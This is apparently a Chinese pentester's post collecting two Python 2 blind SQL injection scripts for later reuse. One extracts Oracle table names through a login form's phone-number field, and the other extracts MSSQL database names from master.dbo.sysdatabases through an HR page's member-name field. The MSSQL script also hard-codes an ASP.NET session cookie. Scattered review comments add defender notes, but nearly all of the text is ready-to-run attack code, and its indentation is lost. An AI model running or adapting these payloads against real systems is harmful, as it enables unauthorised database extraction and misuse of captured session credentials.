记录最近项目写的几个盲注脚本,方便以后使用
1、ORACLE布尔型盲注
import urllib
import urllib2
import requests
# --- Oracle boolean-based blind probe (Python 2 syntax: `print` statement, `except X, e`) ---
# NOTE(review): indentation was lost in this paste, so the nesting of the
# `for` / `try` / `if` / `break` lines below cannot be read from the text; the
# comments describe each line as written, not a reconstructed control flow.
# `requests` (imported above) is never used in this section.
# Candidate characters tried at each position: '_' and upper-case letters only.
payloads = '_ABCDEFGHIJKLMNOPQRSTUVWXYZ'
header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' }
values={}  # POST form fields; rewritten on every iteration
print 'Start to retrive database:'
database= ''  # accumulated answer; note the query below reads table_name, not a database name
# The length of the current table name must be determined manually first (hence the fixed 1..20 range).
for i in range(1, 21):
for payload in payloads:
try:
values['loginType']='2'
values['password']='12345678'
# The probe lives in the phoneNumber field: it compares character `i` of the
# first row of user_tables (rownum=1) with the candidate `payload`.
# Defender note: a parameterized lookup on phoneNumber makes this inert, and the
# burst of near-identical POSTs differing only in position/candidate is the
# traffic pattern to alert on.
values['phoneNumber']="' or (select substr(table_name,%s,1) from user_tables where rownum=1)='%s' and '1'='1" % (str(i),str(payload))
data = urllib.urlencode(values)
url = "https://xxx.xxx.xxx.xxx/api/xxx/reg/action/xxx/appUserLogin.json"
req = urllib2.Request(url,data=data,headers=header)
resp = urllib2.urlopen(req).read()  # whole body read into memory; no timeout or status handling
# Match the keyword to output the correct name: a body containing "status"
# is treated as the "true" oracle answer for this candidate.
if "status" in resp:
database += payload
print 'the database is:'+ database
break
else:
print 'dumping database...'
# Any failure (network, HTTP error, encoding) is printed and the loop continues.
except Exception,e:
print e
2、MSSQL布尔型盲注
import urllib
import urllib2
import requests
# --- MSSQL boolean-based blind probe: shared module state (Python 2 syntax) ---
# `requests` (imported above) is never used in this section.
payloads = 'abcdefghijklmnopqrstuvwxyz_'  # candidate characters; lower-case letters and '_' only
# NOTE(review): the Cookie header embeds a hard-coded ASP.NET_SessionId value, i.e. a
# credential in source. Treat the file as sensitive and invalidate that session.
header = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','Cookie':'ASP.NET_SessionId=4vmyjpbw03vk2aq0q5mlbemy'}
values={}  # POST form fields; mutated in place by dump_db() and by the loop below
print 'Start to retrive database:'
user= ''  # assigned but never referenced in this listing
length=[]  # name lengths found by the outer loop below
databases=[]  # completed names, appended by dump_db()
db=''  # name currently being assembled by dump_db(); reset after each completed name
#注出数据库
# Dump database names: recover the name of the sysdatabases row with dbid `i`,
# whose length `j` is already known, one character per position 1..j.
# Args:
#   i -- dbid value substituted into the probe.
#   j -- name length; positions 1..j are probed.
# Returns None. Side effects: mutates the module globals `values`, `db` and
# `databases`, prints progress, and prints (rather than raises) any exception.
# NOTE(review): indentation is lost in this paste, so which loop the `break`
# and the `if n == j` reset belong to cannot be read from the text.
def dump_db(i,j):
global db  # accumulated across iterations; cleared once a full name is stored
for n in range(1,j+1):
for payload in payloads:
try:
# Probe: true when the row with this dbid has `payload` at position n of its name.
# Defender note: the literal master.dbo.sysdatabases reference and the `--` tail
# are straightforward log/WAF signatures; parameterizing the txtMemberName
# lookup removes the oracle entirely.
values['txtMemberName']="xxx%' and (select count(*) from master.dbo.sysdatabases where dbid={0} and substring(name,{1},1)='{2}')=1--".format(i,n,payload)
data = urllib.urlencode(values)
url = "http://xxx.xxx.xxx/HR/xxx/xxx.aspx"
req = urllib2.Request(url,data=data,headers=header)
resp = urllib2.urlopen(req).read()  # whole body read into memory; no timeout or status handling
if "Robert" in resp:  # "Robert" in the response body is the "true" oracle answer
db += payload
print db
if n == j:  # last position reached: store the finished name and reset
databases.append(db)
db=''
break
else:
print 'dumping database...'
except Exception,e:  # errors are printed and probing continues
print e
# Iterate to determine each database's name length; the number of databases
# (dbids 1..18 here) must be determined manually.
# NOTE(review): indentation is lost in this paste; the nesting of the lines
# below is described as written, not reconstructed.
for i in range(1,19):
for j in range(1,16):  # candidate lengths 1..15 per dbid
try:
# Probe: true when the sysdatabases row with this dbid has a name of length j.
values['txtMemberName']="xxx%' and (select count(*) from master.dbo.sysdatabases where dbid={0} and len(name)={1})=1--".format(i,j)
data = urllib.urlencode(values)
url = "http://xxx.xxx.xxx/HR/xxx/xxx.aspx"
req = urllib2.Request(url,data=data,headers=header)
#print req
resp = urllib2.urlopen(req).read()  # whole body read into memory; no timeout or status handling
#print resp
if "Robert" in resp:  # "Robert" in the response body is the "true" oracle answer
print 'the length of DB_%s is %s' % (str(i),str(j))
dump_db(i,j)  # recover the name now that its length is known
#print 'the DB is: %s' % str(db)
length.append(j)
break
else:
print 'dumping length...'
except Exception,e:  # errors are printed and probing continues
print e
print '-------------------------'
# NOTE(review): indexes 0..16 are read unconditionally, but `databases` only holds
# as many entries as names dump_db() fully recovered; fewer than 17 raises IndexError.
for ddd in range(0,17):
print databases[ddd]
print '-------------------------'